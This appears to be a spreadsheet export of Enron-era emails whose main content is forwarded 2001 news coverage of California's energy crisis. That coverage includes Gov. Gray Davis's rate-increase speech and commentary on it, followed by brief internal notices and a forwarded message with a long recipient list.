Because Pacific Gas and Electric Co. and Southern California Edison can't p=_x000D_
ay=20_x000D_
their bills -- about $14 billion -- some wholesalers want to cut off sales =_x000D_
to=20_x000D_
the utilities.=20_x000D_
The other three defendants in the ISO's suit -- Dynegy Power Corp. of Houst=_x000D_
on=20_x000D_
and Tulsa-based AES Corp. and its marketer, Williams Energy Marketing &amp;=20_x000D_
Trading Co. -- have entered into written agreements with ISO to continue=20_x000D_
supplying emergency power until the FERC decides whether they are required =_x000D_
to=20_x000D_
sell to companies that are not creditworthy.=20_x000D_
But Charles Robinson, ISO general counsel, points out that the generators c=_x000D_
an=20_x000D_
rescind those agreements with 48 hours' notice.=20_x000D_
"My hope is this is a temporary setback," said Robinson. He added, however,=_x000D_
=20_x000D_
that the practical effect is "at least for now, we don't have a tool to=20_x000D_
compel them to do what we believe they're obligated to do" -- respond to=20_x000D_
emergency demands for power.=20_x000D_
Reliant has insisted since the suit was filed Feb. 6 that Damrell has no=20_x000D_
jurisdiction over the rate schedules that govern dealings between generator=_x000D_
s=20_x000D_
and the ISO, and that the Federal Power Act mandates that the FERC must=20_x000D_
settle any disputes about terms of those tariffs.=20_x000D_
In issuing the injunction, Damrell acknowledged that the FERC has special=_x000D_
=20_x000D_
expertise concerning agreements between generators and ISO.=20_x000D_
"Absent the extreme exigencies of the California power crisis, the court=20_x000D_
agrees that a stay pending further action by the FERC would be proper," he=_x000D_
=20_x000D_
said. "But those are not the facts here. Electricity is in critically short=_x000D_
=20_x000D_
supply. The health and safety of the people of California are potentially a=_x000D_
t=20_x000D_
risk."=20_x000D_
Immediately upon receiving the 9th Circuit's order Thursday, attorneys for=_x000D_
=20_x000D_
the ISO asked Damrell to set an accelerated schedule for its motion to amen=_x000D_
d=20_x000D_
the suit. The agency apparently has crafted a new complaint stressing its=_x000D_
=20_x000D_
view that the matter is an ordinary contract dispute over which the judge h=_x000D_
as=20_x000D_
jurisdiction.=20_x000D_
Damrell scheduled a hearing on the motion for Thursday.=20_x000D_
In a further development that could complicate the state's dire need for=20_x000D_
energy, an alternative supplier won a court fight Thursday to bypass the bi=_x000D_
g=20_x000D_
utilities and sell its power on the open market.=20_x000D_
Timber giant Sierra Pacific Industries, which operates four biomass plants=_x000D_
=20_x000D_
that produce power for PG&amp;E, obtained a temporary restraining order in=20_x000D_
Sacramento Superior Court that says Sierra Pacific is not required to sell=_x000D_
=20_x000D_
its power to PG&amp;E.=20_x000D_
The ruling means PG&amp;E and Southern Edison could lose power as alternative=_x000D_
=20_x000D_
energy generators, fed up with months of nonpayment, sue to be able to sell=_x000D_
=20_x000D_
their comparatively cheap product elsewhere, including outside the state.=_x000D_
=20_x000D_
_x000D_
The Bee's Denny Walsh can be reached at (916) 321-1189 or dwalsh@sacbee.com=_x000D_
.=20_x000D_
Bee staff writer Dale Kasler contributed to this report.=20_x000D_
---------------------------------------------------------------------------=_x000D_
---_x000D_
------------------------------------------------------------------_x000D_
In TV address, Davis embraces rate increase_x000D_
By Dan Smith_x000D_
BEE DEPUTY CAPITOL BUREAU CHIEF_x000D_
(Published April 6, 2001)=20_x000D_
Seeking to ease Californians' energy fears, Gov. Gray Davis on Thursday=20_x000D_
proposed a tiered electricity rate increase that would hit the heaviest pow=_x000D_
er=20_x000D_
users the hardest.=20_x000D_
The Democratic governor, whose popularity has been plummeting, told a=20_x000D_
statewide television audience in a five-minute speech from his Capitol=20_x000D_
office: "It's become increasingly clear ... that some rate increases now ar=_x000D_
e=20_x000D_
necessary to keep our lights on and our economy strong."=20_x000D_
The address came as California enters its fifth month of acute power woes=_x000D_
=20_x000D_
that have resulted in periodic electricity blackouts.=20_x000D_
In embracing a rate increase as part of the solution to California's energy=_x000D_
=20_x000D_
nightmare, Davis joined a long list of financial and energy experts --=20_x000D_
including members of his own staff -- who for months have said a rate=20_x000D_
increase is imperative.=20_x000D_
The state Public Utilities Commission last week approved a $4.8 billion a=_x000D_
=20_x000D_
year, average 30 percent rate increase for customers of cash-strapped Pacif=_x000D_
ic=20_x000D_
Gas and Electric Co., Southern California Edison and San Diego Gas &amp;=20_x000D_
Electric.=20_x000D_
But Davis said his plan, which he will ask the PUC to approve instead, is=_x000D_
=20_x000D_
better. Administration officials said the governor's plan goes easier on=20_x000D_
commercial users and conservation-minded residential users, but preserves t=_x000D_
he=20_x000D_
largest rate increases for heavy residential users. Sacramento Municipal=20_x000D_
Utility District customers would be unaffected by Davis' proposal.=20_x000D_
The 55 percent of PG&amp;E residential customers who use less than 130 percent =_x000D_
of=20_x000D_
the "baseline" amount of power, for instance, would see no increase. Medium=_x000D_
=20_x000D_
users -- those using between 130 percent and 200 percent of the baseline=20_x000D_
amount -- would see an average bill of $70 rise to $77. But heavy users wou=_x000D_
ld=20_x000D_
see their bills go from $138 a month to $189.=20_x000D_
"Here's the point," Davis said. "The more you use, the more you pay. The mo=_x000D_
re=20_x000D_
you conserve, the more you save. Conservation is our best short-term weapon=_x000D_
=20_x000D_
against blackouts and price gouging."=20_x000D_
The rate increase would come on top of an average 9 percent residential rat=_x000D_
e=20_x000D_
increase imposed in January. Davis advisers said the proposed increase woul=_x000D_
d=20_x000D_
eliminate the need for an additional 10 percent increase scheduled to take=_x000D_
=20_x000D_
effect next year.=20_x000D_
Davis said his plan would raise enough money to "restore the utilities to=_x000D_
=20_x000D_
financial stability" if the companies agree to sell their transmission line=_x000D_
s=20_x000D_
to the state, drop their lawsuits against the state and promise to sell che=_x000D_
ap=20_x000D_
power for 10 years. The administration has been negotiating to buy the powe=_x000D_
r=20_x000D_
transmission lines for weeks, and has made little progress with PG&amp;E.=20_x000D_
Even though the governor's rate proposal would raise about 15 percent less=_x000D_
=20_x000D_
revenue than the PUC plan, administration officials insisted it would provi=_x000D_
de=20_x000D_
the utility companies enough money to cover future power purchases and redu=_x000D_
ce=20_x000D_
their debts over time. They said they discovered that the state can buy pow=_x000D_
er=20_x000D_
more cheaply than the PUC thought it could and presumed greater savings=20_x000D_
through conservation.=20_x000D_
Davis' plan relies heavily on floating billions of dollars in bonds,=20_x000D_
essentially stretching the impact of a rate hike over as many as 15 years.=_x000D_
=20_x000D_
Not only would the state borrow about $12 billion to pay for its purchases,=_x000D_
=20_x000D_
but the utilities would borrow about $8 billion. They'd repay the $8 billio=_x000D_
n=20_x000D_
through a slice of the money generated by the rate increase. The utilities=_x000D_
=20_x000D_
also would get a cash infusion of something less than $7 billion from the=_x000D_
=20_x000D_
sale of the transmission grid.=20_x000D_
Harvey Rosenfield of the Foundation for Taxpayer and Consumer Rights said=_x000D_
=20_x000D_
Davis' numbers, while apparently offering a "bailout" of utilities' debts=_x000D_
=20_x000D_
designed to please Wall Street, simply don't add up.=20_x000D_
"He's cooking the books to lower the apparent price to the public, and then=_x000D_
=20_x000D_
they're going to figure out a way to ram this down our throats after the 20=_x000D_
02=20_x000D_
election," he said.=20_x000D_
Analysts called the plan long overdue and questioned whether it would work.=_x000D_
=20_x000D_
"It's definitely a plan from the Wall Street cookbook, but can he get it=20_x000D_
done? Can he get it done in a believable time frame?" said bond analyst Sha=_x000D_
wn=20_x000D_
Burke of Barclays Capital in New York.=20_x000D_
Davis' speech disappointed nearly all other parties.=20_x000D_
"Unfortunately, the steps the governor announced tonight still do not appea=_x000D_
r=20_x000D_
to offer a comprehensive solution to resolve California's energy crisis,"=_x000D_
=20_x000D_
PG&amp;E said in a prepared statement.=20_x000D_
Davis continued to blame power generators for "ripping us off" and federal=_x000D_
=20_x000D_
regulators for failing to stop them, and spent much of his speech detailing=_x000D_
=20_x000D_
the steps that he and state lawmakers have taken to confront the crisis thu=_x000D_
s=20_x000D_
far.=20_x000D_
"Those around (the Capitol) have heard the speech," said Senate President P=_x000D_
ro=20_x000D_
Tem John Burton, D-San Francisco. "He was talking to 34 million Californian=_x000D_
s=20_x000D_
who hadn't."=20_x000D_
Some gubernatorial advisers had been pushing for the speech for weeks,=20_x000D_
arguing that Davis needed to explain his actions -- and his intentions -- a=_x000D_
s=20_x000D_
the onset of warm weather enhances the prospect of power blackouts.=20_x000D_
Davis has come under increasing criticism, including from some members of h=_x000D_
is=20_x000D_
own party, for failing to stem the crisis. Detractors say Davis has been=20_x000D_
indecisive -- even inattentive -- in his handling of the crisis, while his=_x000D_
=20_x000D_
proposals falter in the Legislature and at negotiating tables with=20_x000D_
near-bankrupt utilities.=20_x000D_
Consumer groups, meanwhile, say Davis' failure to more forcefully take on=_x000D_
=20_x000D_
power generators has allowed the crisis to fester, and they blame him for t=_x000D_
he=20_x000D_
rate increases. As the 2002 re-election campaign looms, some private polls=_x000D_
=20_x000D_
now say support for the once-popular Davis is eroding.=20_x000D_
Davis didn't make believers out of Republicans. Assembly GOP leader Dave Co=_x000D_
x=20_x000D_
said the speech was more talk than substance. "Frankly, he didn't offer any=_x000D_
=20_x000D_
new solutions to the problems," said Cox, of Fair Oaks. "What we heard=20_x000D_
tonight was the governor saying, 'Oops, I guess we're going to have to rais=_x000D_
e=20_x000D_
rates,' while all along he'd been saying a rate increase wasn't necessary.=_x000D_
=20_x000D_
And, frankly, it wasn't necessary if we'd gotten started back in September.=_x000D_
"=20_x000D_
Also on Thursday, the Legislature sent Davis a $1.1 billion conservation an=_x000D_
d=20_x000D_
low-income assistance package aimed at reducing California's risk of rollin=_x000D_
g=20_x000D_
blackouts this summer.=20_x000D_
By passing two bills -- SB 5x by state Sen. Byron Sher, D-Palo Alto, and AB=_x000D_
=20_x000D_
29x by Assemblywoman Christine Kehoe, D-San Diego -- lawmakers met their=20_x000D_
stated goal of sending conservation measures to Davis before heading off on=_x000D_
 a=20_x000D_
weeklong spring recess.=20_x000D_
_x000D_
The Bee's Dan Smith can be reached at (916) 321-5249 or smith@sacbee.com.=_x000D_
=20_x000D_
Bee Staff Writers Amy Chance, John Hill, Kevin Yamamura, Dale Kasler and Ji=_x000D_
m=20_x000D_
Sanders contributed to this report.=20_x000D_
---------------------------------------------------------------------------=_x000D_
---_x000D_
-------------------------------------------------------------------------_x000D_
Governor's speech transcript_x000D_
_x000D_
_x000D_
(Published April 6, 2001)=20_x000D_
Here is the text of Gov. Gray Davis' remarks on energy:=20_x000D_
Good evening. I'm speaking to you tonight from Sacramento on the most=20_x000D_
difficult issue facing California: our energy crisis.=20_x000D_
Simply stated, we have two problems: Supply is too low and costs are too=20_x000D_
high. Both result from the flawed deregulation scheme created back in 1996.=_x000D_
=20_x000D_
But no matter how we got into this mess, you hired me to solve problems. An=_x000D_
d=20_x000D_
that's what I'm doing.=20_x000D_
The only long-term solution is to build more power plants. We must also cut=_x000D_
=20_x000D_
back on consumption and stabilize the utilities. But prices won't fall and=_x000D_
=20_x000D_
supply won't be truly reliable until we generate more power than we consume=_x000D_
.=20_x000D_
Yet in the 12 years before I took office, not a single major power plant wa=_x000D_
s=20_x000D_
built in California. Not one. Since I became governor, we've licensed 12=20_x000D_
major power plants. Ten more are in the pipeline. And we're doing this=20_x000D_
without weakening our commitment to clean air and clean water.=20_x000D_
Deregulation required the utilities to sell off many of their power plants =_x000D_
to=20_x000D_
independent generating companies. The generators are free to charge whateve=_x000D_
r=20_x000D_
they want because they're governed only by federal regulators who refuse to=_x000D_
=20_x000D_
control wholesale energy prices.=20_x000D_
This past winter, the prices charged by the generators shot through the roo=_x000D_
f,=20_x000D_
driving the utilities to the brink of bankruptcy.=20_x000D_
In January, with the feds still refusing to do their job, California steppe=_x000D_
d=20_x000D_
in to purchase the power the utilities could no longer afford to buy. We=20_x000D_
didn't take over to save the utilities. We took over to keep the power on a=_x000D_
nd=20_x000D_
the economy strong. That's not all:=20_x000D_
We also negotiated long-term contracts for electricity at vastly lower=20_x000D_
prices.=20_x000D_
I used my emergency powers to seize control of low-cost power contracts the=_x000D_
=20_x000D_
utilities were about to forfeit to the generators.=20_x000D_
We began negotiations to buy the utilities' transmission system.=20_x000D_
We cut red tape and offered cash incentives to speed up construction of pow=_x000D_
er=20_x000D_
plants.=20_x000D_
We're launching an $800 million conservation program.=20_x000D_
We're moving to establish a public power authority to build more power. If=_x000D_
=20_x000D_
the private sector fails to build all the plants California needs, we'll=20_x000D_
build them ourselves.=20_x000D_
And because I share your concern that the generators are ripping us off,=20_x000D_
we're using every legal remedy to root out and punish illegal conduct.=20_x000D_
We can't fix 12 years of inaction overnight. But we're making real progress=_x000D_
.=20_x000D_
Now, as you know, I have fought tooth and nail against raising rates. It's=_x000D_
=20_x000D_
become increasingly clear, however, that with rising natural gas prices, th=_x000D_
e=20_x000D_
feds' failure to control costs, and the state's lack of supply, that some=_x000D_
=20_x000D_
increases now are necessary to keep our lights on and our economy strong.=_x000D_
=20_x000D_
But I remain committed to protecting average Californians from massive rate=_x000D_
=20_x000D_
hikes. So I'm urging the Public Utilities Commission to adopt a plan that=_x000D_
=20_x000D_
will protect average consumers, reward those who conserve and motivate the=_x000D_
=20_x000D_
biggest users to cut back.=20_x000D_
Under my proposal, more than half of you won't pay a penny more. For the=20_x000D_
rest, the average increase will be 26 and a half percent. But many in that=_x000D_
=20_x000D_
group will pay only about a 10 percent rate increase. The heaviest users wi=_x000D_
ll=20_x000D_
see their rates rise 34 and a half percent on average. That includes busine=_x000D_
ss=20_x000D_
paying their share. This is in addition to the 9 percent surcharge we've al=_x000D_
l=20_x000D_
been paying since last winter.=20_x000D_
But all Californians can reduce their bills through conservation.=20_x000D_
Here's the point: The more you use, the more you pay. The more you conserve=_x000D_
,=20_x000D_
the more you save. Conservation is our best short-term weapon against=20_x000D_
blackouts and price-gouging. By flexing your power, you'll help secure our=_x000D_
=20_x000D_
energy future.=20_x000D_
Unlike the PUC, my plan includes funds to restore the utilities to financia=_x000D_
l=20_x000D_
stability -- if they agree to three main conditions:=20_x000D_
They must provide low-cost regulated power to the state for 10 years. Agree=_x000D_
=20_x000D_
to sell us their transmission system. And dismiss their lawsuits which seek=_x000D_
=20_x000D_
to double your electricity rates.=20_x000D_
My proposal raises rates fairly, assures us of long-term power, stabilizes=_x000D_
=20_x000D_
the utilities and promotes conservation.=20_x000D_
Our emphasis on conservation is critical. In order to make it through the=_x000D_
=20_x000D_
summer, we must cut demand by at least 10 percent.=20_x000D_
Already we've launched programs to cut back commercial lighting, and reduce=_x000D_
=20_x000D_
consumption in office buildings, supplies and government facilities.=20_x000D_
My friends, we do have a power shortage but we are far from powerless. We a=_x000D_
re=20_x000D_
34 million strong and if each of us does our part, we can minimize=20_x000D_
disruptions and get through the summer. We are Californians. We've withstoo=_x000D_
d=20_x000D_
earthquakes, floods, fires, and droughts.=20_x000D_
Yes, this mess is man-made, but with your help and God's blessing, we'll ge=_x000D_
t=20_x000D_
through this as well.=20_x000D_
Thank you and good night.=20_x000D_
---------------------------------------------------------------------------=_x000D_
---_x000D_
--------------------------------------------------_x000D_
Dan Walters: Davis finally acknowledges 'crisis,' backs a rate increase_x000D_
_x000D_
_x000D_
(Published April 6, 2001)=20_x000D_
Gov. Gray Davis -- under fire from the media and other politicians for his=_x000D_
=20_x000D_
passive, incremental handling of the state's deepening energy crisis --=20_x000D_
unveiled Thursday what he said was a comprehensive scheme to resolve it,=20_x000D_
including a hefty increase in power rates paid by most consumers.=20_x000D_
It was a full-court press by Davis and his administration, including a brie=_x000D_
f=20_x000D_
statewide television address and a turnout of aides to sell the scheme to t=_x000D_
he=20_x000D_
media. Davis -- for the first time -- even used the term "crisis" to descri=_x000D_
be=20_x000D_
the situation after weeks of insisting it was merely a "challenge."=20_x000D_
Clearly, a major motivating factor in the governor's new activism is that h=_x000D_
is=20_x000D_
own re-election in 2002 is now in peril if the energy crisis persists and h=_x000D_
e=20_x000D_
continues to deal with it reactively. Editorial writers have been describin=_x000D_
g=20_x000D_
Davis' reactive approach as cowardly, and private polls have been indicatin=_x000D_
g=20_x000D_
that since an unexpected power blackout hit last month, Davis' approval=20_x000D_
ratings have been plummeting, from well over 60 percent to perhaps half tha=_x000D_
t=20_x000D_
level. And certainly Davis' own nonstop polling has told him the same thing=_x000D_
.=20_x000D_
While much of Thursday evening's five-minute address was a truncated versio=_x000D_
n=20_x000D_
of what Davis has been saying publicly for the past few weeks, most recentl=_x000D_
y=20_x000D_
at the state Democratic convention in Anaheim last weekend, the one new=20_x000D_
element was an endorsement of rate increases after months of insisting that=_x000D_
=20_x000D_
the problems could be resolved "within the existing rate structure." Davis=_x000D_
=20_x000D_
proposed a rate boost similar in structure, but apparently slightly less,=_x000D_
=20_x000D_
than the one tentatively endorsed by the state Public Utilities Commission=_x000D_
=20_x000D_
last week. Davis had insisted that the PUC, although controlled by his=20_x000D_
appointees, had acted on its own, but the widespread skepticism about that=_x000D_
=20_x000D_
posture merely added to his image problems.=20_x000D_
Like the PUC plan, the Davis rate scheme would concentrate the rate increas=_x000D_
es=20_x000D_
on heavy residential power users and businesses. "I'm urging the (PUC) to=_x000D_
=20_x000D_
adopt a plan that will protect average consumers, reward those who conserve=_x000D_
=20_x000D_
and motivate the biggest users to cut back," Davis said, adding that the pl=_x000D_
an=20_x000D_
will "restore the utilities to financial stability" if they agree to sell=_x000D_
=20_x000D_
their intercity power transmission system to the state, provide low-cost=20_x000D_
power to the state for 10 years and drop federal lawsuits seeking=20_x000D_
compensation for their immense debts.=20_x000D_
It's unclear, however, whether the average 26.5 percent boost in rates to=_x000D_
=20_x000D_
customers of the three major privately owned utilities -- about 70 percent =_x000D_
of=20_x000D_
Californians -- will do all that the Democratic governor insists it will. H=_x000D_
e=20_x000D_
and his aides say it will cover the $5 billion or so that the state's gener=_x000D_
al=20_x000D_
fund already has spent on emergency power purchases since January, finance=_x000D_
=20_x000D_
future purchases and still provide enough "headroom" to pay off the=20_x000D_
utilities' $13 billion in debts, part of which would be covered by the=20_x000D_
transmission grid buyout. But the utilities and their creditors were alread=_x000D_
y=20_x000D_
complaining that the PUC's somewhat larger rate boost was too small to cove=_x000D_
r=20_x000D_
all the various costs and debts.=20_x000D_
Davis aides refused to release specific numbers on how each cost factor wou=_x000D_
ld=20_x000D_
be covered by the proposed rate boost. The governor's hike would come on to=_x000D_
p=20_x000D_
of a 9 percent surcharge on power bills imposed in January and now being ma=_x000D_
de=20_x000D_
permanent.=20_x000D_
Even if it pencils out and is implemented by the PUC, however, the Davis pl=_x000D_
an=20_x000D_
would leave Californians with some of the nation's highest utility rates an=_x000D_
d=20_x000D_
invite a backlash from consumer activists who have been threatening to=20_x000D_
sponsor a 2002 ballot measure if there's a "bailout" of utilities. The plan=_x000D_
=20_x000D_
would also have to win the approval of Wall Street bankers, who would=20_x000D_
underwrite and market the billions of dollars in bonds that Davis wants to=_x000D_
=20_x000D_
float to pay for past debts and future power costs.=20_x000D_
Will it be implemented? Will it work? Will it arrest Davis' slide in the=20_x000D_
polls? No one can say for certain -- and that includes the governor himself=_x000D_
.=20_x000D_
_x000D_
The Bee's Dan Walters can be reached at (916) 321-1195 or dwalters@sacbee.c=_x000D_
om_x000D_
.=20_x000D_
---------------------------------------------------------------------------=_x000D_
---_x000D_
------------------------------------------------------------------------_x000D_
_x000D_
Davis endorses rate hikes, defends handling of energy crisis=20_x000D_
_x000D_
_x000D_
_x000D_
By Jennifer Coleman_x000D_
ASSOCIATED PRESS=20_x000D_
April 5, 2001=20_x000D_
SACRAMENTO =01) Gov. Gray Davis told Californians in a live address Thursda=_x000D_
y=20_x000D_
night that he now thinks rate increases are needed to resolve the state's=_x000D_
=20_x000D_
power crisis.=20_x000D_
Davis, reacting to record rate hikes of up to 46 percent approved by state=_x000D_
=20_x000D_
regulators last week for Pacific Gas and Electric Co. and Southern Californ=_x000D_
ia=20_x000D_
Edison power customers, said he wants to make those who use the most=20_x000D_
electricity bear the bulk of the price hikes.=20_x000D_
"The more you conserve, the more you save," Davis said. "Conservation is ou=_x000D_
r=20_x000D_
best short-term weapon against blackouts and price-gouging."=20_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
San Diego utility overspent $98 million, consumer group says=20_x000D_
Text of Gov. Gray Davis' energy speech=20_x000D_
?=20_x000D_
_x000D_
_x000D_
_x000D_
Speaking from his Capitol office in a televised five-minute speech, Davis=_x000D_
=20_x000D_
lashed out at federal power regulators for failing to help California and=_x000D_
=20_x000D_
defended his handling of the state's energy problems.=20_x000D_
The Democrat told viewers California's short power supply and high wholesal=_x000D_
e=20_x000D_
costs are the result of a "flawed deregulation scheme" signed into law in=_x000D_
=20_x000D_
1996 by then-Republican Gov. Pete Wilson.=20_x000D_
"But no matter how we got into this mess, you hired me to solve problems an=_x000D_
d=20_x000D_
that's what I'm doing," he said.=20_x000D_
Davis said he has fought utility rate increases "tooth and nail" but now=20_x000D_
thinks they are needed to help finance the state's power purchases on behal=_x000D_
f=20_x000D_
of Edison, PG&amp;E and a third strapped utility, San Diego Gas &amp; Electric.=20_x000D_
The power buys have cost taxpayers $4.7 billion since January, money that=_x000D_
=20_x000D_
will eventually be recouped from ratepayers.=20_x000D_
Davis said the utilities were pushed to the brink of bankruptcy by soaring=_x000D_
=20_x000D_
wholesale power costs and federal regulators' refusal to cap wholesale=20_x000D_
prices.=20_x000D_
"In January, with the feds still refusing to do their job, California stepp=_x000D_
ed=20_x000D_
in to purchase the power the utilities could no longer afford to buy," Davi=_x000D_
s=20_x000D_
said. "We didn't take over to save the utilities. We took over to keep the=_x000D_
=20_x000D_
power on and the economy strong."=20_x000D_
Davis, who repeatedly has said the state can resolve the power problems=20_x000D_
without rate hikes, told viewers he now thinks rate increases are necessary=_x000D_
=20_x000D_
to finance the power purchases.=20_x000D_
His new stance comes after the state Public Utilities Commission last week=_x000D_
=20_x000D_
approved rate increases of up to 46 percent for customers of Edison and PG&amp;=_x000D_
E.=20_x000D_
The commission has not yet decided how to spread the rate increases among t=_x000D_
he=20_x000D_
utilities' customers.=20_x000D_
Davis said he will propose a tiered rate plan that would mean a 26.5 percen=_x000D_
t=20_x000D_
rate increase for the average customer. Under the governor's plan, the=20_x000D_
heaviest power users would see an average 34.5 percent rate increase.=20_x000D_
According to the Davis administration, the governor's plan would let Edison=_x000D_
,=20_x000D_
PG&amp;E and the state's third investor-owned utility, San Diego Gas &amp; Electric=_x000D_
,=20_x000D_
to make a total of $8 billion in debt payments over a decade.=20_x000D_
Davis' plan would shift the burden of the PUC rate increase to heavier=20_x000D_
residential, commercial and industrial power users while largely sparing=20_x000D_
agricultural users, who would only see increases of 5 to 15 percent.=20_x000D_
"We are going to take the governor's proposal under advisement and give it =_x000D_
a=20_x000D_
lot of weight, I suspect," PUC Commissioner Carl Wood said, adding that the=_x000D_
=20_x000D_
commission will seek input from consumer groups and businesses before makin=_x000D_
g=20_x000D_
a final decision.=20_x000D_
The three utilities say they have lost more than $14 billion since June due=_x000D_
=20_x000D_
to soaring wholesale power costs. More than $13 billion of that comes from=_x000D_
=20_x000D_
Edison and PG&amp;E, who have been barred under the state's deregulation law fr=_x000D_
om=20_x000D_
recovering the rising costs from their customers.=20_x000D_
Davis =01) facing mounting pressure from Republicans and fellow Democrats t=_x000D_
o=20_x000D_
resolve California's energy crisis =01) delivered the speech from behind a =_x000D_
desk,=20_x000D_
with his hands clasped in front of him.=20_x000D_
He assured residents that the state would survive the crisis.=20_x000D_
"We are Californians. We've withstood earthquakes, floods, fires and=20_x000D_
droughts," Davis said. "Yes, this is man-made, but with your help and God's=_x000D_
=20_x000D_
blessing, we'll get through this as well."=20_x000D_
He said he would stand by his plan to help restore the utilities to financi=_x000D_
al=20_x000D_
health by negotiating state acquisition of their transmission lines and=20_x000D_
requiring them to sell low-cost power to the state for a decade and drop=20_x000D_
their lawsuits seeking to double their electric rates.=20_x000D_
Davis urged Californians to help cut power use 10 percent to fend off rolli=_x000D_
ng=20_x000D_
blackouts this summer, when residents will crank their air conditioners and=_x000D_
=20_x000D_
demand will rise sharply.=20_x000D_
The Legislature on Thursday afternoon sent Davis proposals that would spend=_x000D_
=20_x000D_
$1.1 billion on conservation programs for consumers and businesses. Davis=_x000D_
=20_x000D_
plans to sign the measures.=20_x000D_
He listed actions he has taken to try to solve the power crisis, including=_x000D_
=20_x000D_
negotiating long-term contracts to purchase power and buy the utilities'=20_x000D_
transmission lines.=20_x000D_
Davis also said he has cut red tape and provided incentives to speed power=_x000D_
=20_x000D_
plant construction after a decade with none built.=20_x000D_
"We can't fix 12 years of inaction overnight. But we're making real=20_x000D_
progress," he said.=20_x000D_
The speech, the first such message Davis has delivered besides his annual=_x000D_
=20_x000D_
State of the State address, comes as the GOP and even fellow Democrats=20_x000D_
criticize the governor's handling of the crisis.=20_x000D_
Consumer groups, angered by the rate increases, are promising a revolt at t=_x000D_
he=20_x000D_
polls in 2002, planning to roll back the rate hikes through an initiative=_x000D_
=20_x000D_
that would share the ballot with Davis, who is up for re-election then.=20_x000D_
Consumer advocate Harvey Rosenfield said Davis is failing to protect utilit=_x000D_
y=20_x000D_
customers. He compared power suppliers to blackmailers charging an=20_x000D_
"extortionary price for electricity."=20_x000D_
"Nothing the governor has said tonight will do anything to stop the=20_x000D_
profiteers," said Rosenfield of the Foundation for Consumer and Taxpayer=20_x000D_
Rights in Santa Monica.=20_x000D_
Power supplier Duke Energy said it has done nothing wrong and doesn't deser=_x000D_
ve=20_x000D_
criticism for the wholesale prices.=20_x000D_
"We are running our power plants at historically high levels to keep=20_x000D_
consumers' lights on," Duke said in a written statement.=2</t>
  </si>
  <si>
    <t>Wed, 6 Feb 2002 12:16:17 -0800 (PST)</t>
  </si>
  <si>
    <t>Request Submitted: Access Request for jeanne.wukasch@enron.com</t>
  </si>
  <si>
    <t xml:space="preserve">You have received this email because you are listed as a data approver. Please click http://itcapps.corp.enron.com/srrs/auth/emailLink.asp?ID=000000000082433&amp;Page=Approval to review and act upon this request._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Request ID          : 000000000082433_x000D_
Request Create Date : 2/6/02 2:16:13 PM_x000D_
Requested For       : jeanne.wukasch@enron.com_x000D_
Resource Name       : Sitara Houston Production West Edit Logistics_x000D_
Resource Type       : Applications_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 22 Sep 1999 10:18:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'tom.shelton@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'mark.haedicke@enron.com', 'brian.redmond@enron.com', 'steve.schneider@enron.com', 'steven.kean@enron.com', 'andy.unverzagt@enron.com'})</t>
  </si>
  <si>
    <t>City of Houston Pipeline fee matter</t>
  </si>
  <si>
    <t xml:space="preserve">Attached is an update on the referenced matter.  Please call me if you have _x000D_
any questions, comments, or suggestions.  Steve Kean, you may want to mention _x000D_
this to Ken Lay, since he was involved in this very early on (a meeting with _x000D_
Mayor Lanier probably in 1996 or so), and may be involved again.  Feel free _x000D_
to forward this memo to others who may be interested._x000D_
</t>
  </si>
  <si>
    <t>Sat, 8 Apr 2000 03:22:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>MAY DAY</t>
  </si>
  <si>
    <t xml:space="preserve">Great job at the law conf!  You need to send a vcr tape up to us of the _x000D_
presentation so MKM and our group can use it for sensitivity training!!!  On _x000D_
other news, whats up with this????  Related to their downsizing?  Lorraine's _x000D_
a star--I was surprized to see this._x000D_
_x000D_
See you soon, DF_x000D_
---------------------- Forwarded by Drew Fossum/ET&amp;S/Enron on 04/08/2000 _x000D_
10:19 AM ---------------------------_x000D_
_x000D_
_x000D_
Rhonda White &lt;rwhite@INGAA.org&gt; on 04/06/2000 10:03:29 AM_x000D_
To: "'jabbott@entrix.com'" &lt;jabbott@entrix.com&gt;, "'dbobbish@velaw.com'" _x000D_
&lt;dbobbish@velaw.com&gt;, "'Jan Canup'" &lt;jcanup@entrix.com&gt;, "'John Castleberry'" _x000D_
&lt;castjk@wbip.com&gt;, "'James Cleary'" &lt;jim_cleary@sonat.com&gt;, _x000D_
"'amy.baldwin@coastalcorp.com'" &lt;amy.baldwin@coastalcorp.com&gt;, "'Cynthia _x000D_
Corcoran'" &lt;cynthiacorcoran@corcoran-law.com&gt;, "'James Costan'" _x000D_
&lt;jmcostan@mwbb.com&gt;, "'Tom Eastment'" &lt;t_eastment@bakerbotts.com&gt;, "'Brian _x000D_
Elliott'" &lt;belliot@nicor.com&gt;, "'Drew Fossum'" &lt;dfossum@enron.com&gt;, _x000D_
"'pges@dynegy.com'" &lt;pges@dynegy.com&gt;, "'Patty Francis'" _x000D_
&lt;patty_francis@sonat.com&gt;, "'Les Fryock'" &lt;lfyock@aga.org&gt;, "'Dr. Jerry _x000D_
Green'" &lt;jgreen@hbs.edu&gt;, "'William von Glahn'" &lt;bvonglahn@lgl.twc.com&gt;, _x000D_
"'John Gregg'" &lt;jgregg@mbolaw.com&gt;, "'Edward Grenier'" &lt;egrenier@sablaw.com&gt;, _x000D_
"'Susan Halbach'" &lt;halbachs@epenergy.com&gt;, "'jrharrington@energyfacts.com'" _x000D_
&lt;jrharrington@energyfacts.com&gt;, "'Phyllis Huckabee'" &lt;phuckabee@sempra.com&gt;, _x000D_
"'Terry Hudgens'" &lt;hudgetf@texaco.com&gt;, "'pjagtiani@ngsa.org'" _x000D_
&lt;pjagtiani@ngsa.org&gt;, "'Tim Kelley'" &lt;tdk66@aol.com&gt;, "'Mary Klyasheff'" _x000D_
&lt;mklyash@pecorp.com&gt;, "'Mark MacDougall'" &lt;macdougm@smeco.com&gt;, "'Dorothy _x000D_
McCoppin'" &lt;dmccopp@enron.com&gt;, "'gisb@aol.com'" &lt;gisb@aol.com&gt;, _x000D_
"'mramsey@williams.com'" &lt;mramsey@williams.com&gt;, "'Steve Rexwinkle'" _x000D_
&lt;stever@midcoastenergy.com&gt;, "'dristig@reliantenergy.com'" _x000D_
&lt;dristig@reliantenergy.com&gt;, "'Lila Rothman'" &lt;rothmanl@coned.com&gt;, _x000D_
